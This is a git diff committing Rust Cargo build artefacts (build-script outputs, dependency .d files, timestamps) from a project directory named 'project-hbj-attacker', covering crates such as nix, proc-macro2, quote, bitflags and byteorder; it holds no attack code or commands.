+++ b/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/output
@@ -0,0 +1,25 @@
+cargo:rustc-check-cfg=cfg(android)
+cargo:rustc-check-cfg=cfg(dragonfly)
+cargo:rustc-check-cfg=cfg(ios)
+cargo:rustc-check-cfg=cfg(freebsd)
+cargo:rustc-check-cfg=cfg(illumos)
+cargo:rustc-check-cfg=cfg(linux)
+cargo:rustc-cfg=linux
+cargo:rustc-check-cfg=cfg(macos)
+cargo:rustc-check-cfg=cfg(netbsd)
+cargo:rustc-check-cfg=cfg(openbsd)
+cargo:rustc-check-cfg=cfg(solaris)
+cargo:rustc-check-cfg=cfg(watchos)
+cargo:rustc-check-cfg=cfg(tvos)
+cargo:rustc-check-cfg=cfg(visionos)
+cargo:rustc-check-cfg=cfg(apple_targets)
+cargo:rustc-check-cfg=cfg(bsd)
+cargo:rustc-check-cfg=cfg(bsd_without_apple)
+cargo:rustc-check-cfg=cfg(linux_android)
+cargo:rustc-cfg=linux_android
+cargo:rustc-check-cfg=cfg(freebsdlike)
+cargo:rustc-check-cfg=cfg(netbsdlike)
+cargo:rustc-check-cfg=cfg(solarish)
+cargo:rustc-check-cfg=cfg(fbsd14)
+cargo:rustc-check-cfg=cfg(qemu)
+cargo:rustc-check-cfg=cfg(target_os, values("cygwin"))
diff --git a/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/root-output b/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/root-output
new file mode 100644
index 0000000..7ab98e1
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/root-output
@@ -0,0 +1 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/out
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/stderr b/01/project-hbj-attacker/target/debug/build/nix-e02e9f067f5ef79a/stderr
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build-script-build b/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build-script-build
new file mode 100755
index 0000000..9379ee3
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14 b/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14
new file mode 100755
index 0000000..9379ee3
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14 differ
diff --git a/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14.d b/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14.d
new file mode 100644
index 0000000..bc91920
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/nix-f409c0380beaaf14/build_script_build-f409c0380beaaf14: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/build.rs:
diff --git a/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/invoked.timestamp b/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/output b/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/output
new file mode 100644
index 0000000..d3d235a
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/output
@@ -0,0 +1,23 @@
+cargo:rustc-check-cfg=cfg(fuzzing)
+cargo:rustc-check-cfg=cfg(no_is_available)
+cargo:rustc-check-cfg=cfg(no_literal_byte_character)
+cargo:rustc-check-cfg=cfg(no_literal_c_string)
+cargo:rustc-check-cfg=cfg(no_source_text)
+cargo:rustc-check-cfg=cfg(proc_macro_span)
+cargo:rustc-check-cfg=cfg(proc_macro_span_file)
+cargo:rustc-check-cfg=cfg(proc_macro_span_location)
+cargo:rustc-check-cfg=cfg(procmacro2_backtrace)
+cargo:rustc-check-cfg=cfg(procmacro2_build_probe)
+cargo:rustc-check-cfg=cfg(procmacro2_nightly_testing)
+cargo:rustc-check-cfg=cfg(procmacro2_semver_exempt)
+cargo:rustc-check-cfg=cfg(randomize_layout)
+cargo:rustc-check-cfg=cfg(span_locations)
+cargo:rustc-check-cfg=cfg(super_unstable)
+cargo:rustc-check-cfg=cfg(wrap_proc_macro)
+cargo:rerun-if-changed=src/probe/proc_macro_span.rs
+cargo:rustc-cfg=wrap_proc_macro
+cargo:rerun-if-changed=src/probe/proc_macro_span_location.rs
+cargo:rustc-cfg=proc_macro_span_location
+cargo:rerun-if-changed=src/probe/proc_macro_span_file.rs
+cargo:rustc-cfg=proc_macro_span_file
+cargo:rerun-if-env-changed=RUSTC_BOOTSTRAP
diff --git a/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/root-output b/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/root-output
new file mode 100644
index 0000000..b5c8eee
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/root-output
@@ -0,0 +1 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/out
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/stderr b/01/project-hbj-attacker/target/debug/build/proc-macro2-98c49a84dbf4e8cc/stderr
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build-script-build b/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build-script-build
new file mode 100755
index 0000000..e67f0c3
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa b/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa
new file mode 100755
index 0000000..e67f0c3
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa differ
diff --git a/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa.d b/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa.d
new file mode 100644
index 0000000..0eb93e4
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/build.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/proc-macro2-aa66788d6c54b9fa/build_script_build-aa66788d6c54b9fa: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/build.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/proc-macro2-1.0.101/build.rs:
diff --git a/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build-script-build b/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build-script-build
new file mode 100755
index 0000000..b36d685
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build-script-build differ
diff --git a/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e b/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e
new file mode 100755
index 0000000..b36d685
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e differ
diff --git a/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e.d b/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e.d
new file mode 100644
index 0000000..56be08d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/build.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/quote-63c10b5fc1327b7e/build_script_build-63c10b5fc1327b7e: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/build.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/quote-1.0.41/build.rs:
diff --git a/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/invoked.timestamp b/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/output b/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/output
new file mode 100644
index 0000000..6d81eca
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/output
@@ -0,0 +1,2 @@
+cargo:rerun-if-changed=build.rs
+cargo:rustc-check-cfg=cfg(no_diagnostic_namespace)
diff --git a/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/root-output b/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/root-output
new file mode 100644
index 0000000..c4bff17
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/root-output
@@ -0,0 +1 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/out
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/stderr b/01/project-hbj-attacker/target/debug/build/quote-ddf20bb25101601c/stderr
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/bitflags-6bd6ffbc38de7ac6.d b/01/project-hbj-attacker/target/debug/deps/bitflags-6bd6ffbc38de7ac6.d
new file mode 100644
index 0000000..0285b99
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/bitflags-6bd6ffbc38de7ac6.d
@@ -0,0 +1,13 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/bitflags-6bd6ffbc38de7ac6.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbitflags-6bd6ffbc38de7ac6.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbitflags-6bd6ffbc38de7ac6.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/bitflags-b38c1791fbb94bbd.d b/01/project-hbj-attacker/target/debug/deps/bitflags-b38c1791fbb94bbd.d
new file mode 100644
index 0000000..4fa5122
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/bitflags-b38c1791fbb94bbd.d
@@ -0,0 +1,13 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/bitflags-b38c1791fbb94bbd.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbitflags-b38c1791fbb94bbd.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbitflags-b38c1791fbb94bbd.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/bitflags-f4c5089826d514d1.d b/01/project-hbj-attacker/target/debug/deps/bitflags-f4c5089826d514d1.d
new file mode 100644
index 0000000..c29b0c9
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/bitflags-f4c5089826d514d1.d
@@ -0,0 +1,11 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/bitflags-f4c5089826d514d1.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbitflags-f4c5089826d514d1.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/iter.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/parser.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/traits.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/public.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/internal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/bitflags-2.10.0/src/external.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/byteorder-488d2f8c43033f2b.d b/01/project-hbj-attacker/target/debug/deps/byteorder-488d2f8c43033f2b.d
new file mode 100644
index 0000000..df92a04
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/byteorder-488d2f8c43033f2b.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/byteorder-488d2f8c43033f2b.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbyteorder-488d2f8c43033f2b.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbyteorder-488d2f8c43033f2b.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/byteorder-660949308c728b98.d b/01/project-hbj-attacker/target/debug/deps/byteorder-660949308c728b98.d
new file mode 100644
index 0000000..383be78
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/byteorder-660949308c728b98.d
@@ -0,0 +1,8 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/byteorder-660949308c728b98.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbyteorder-660949308c728b98.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbyteorder-660949308c728b98.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/byteorder-ec64c3234ca862a5.d b/01/project-hbj-attacker/target/debug/deps/byteorder-ec64c3234ca862a5.d
new file mode 100644
index 0000000..e4b855b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/byteorder-ec64c3234ca862a5.d
@@ -0,0 +1,6 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/byteorder-ec64c3234ca862a5.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libbyteorder-ec64c3234ca862a5.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/byteorder-1.5.0/src/io.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/cfg_aliases-4c174da7cc486c29.d b/01/project-hbj-attacker/target/debug/deps/cfg_aliases-4c174da7cc486c29.d
new file mode 100644
index 0000000..01a31f5
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/cfg_aliases-4c174da7cc486c29.d
@@ -0,0 +1,7 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/cfg_aliases-4c174da7cc486c29.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg_aliases-0.2.1/src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libcfg_aliases-4c174da7cc486c29.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg_aliases-0.2.1/src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libcfg_aliases-4c174da7cc486c29.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg_aliases-0.2.1/src/lib.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg_aliases-0.2.1/src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/cfg_if-0d06577c98329a83.d b/01/project-hbj-attacker/target/debug/deps/cfg_if-0d06577c98329a83.d
new file mode 100644
index 0000000..7e90500
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/cfg_if-0d06577c98329a83.d
@@ -0,0 +1,5 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/cfg_if-0d06577c98329a83.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg-if-1.0.4/src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libcfg_if-0d06577c98329a83.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg-if-1.0.4/src/lib.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg-if-1.0.4/src/lib.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/cfg_if-43f8c950438ad461.d b/01/project-hbj-attacker/target/debug/deps/cfg_if-43f8c950438ad461.d
new file mode 100644
index 0000000..c293999
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/cfg_if-43f8c950438ad461.d
@@ -0,0 +1,7 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/cfg_if-43f8c950438ad461.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg-if-1.0.4/src/lib.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libcfg_if-43f8c950438ad461.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/cfg-if-1.0.4/src/lib.rs
+
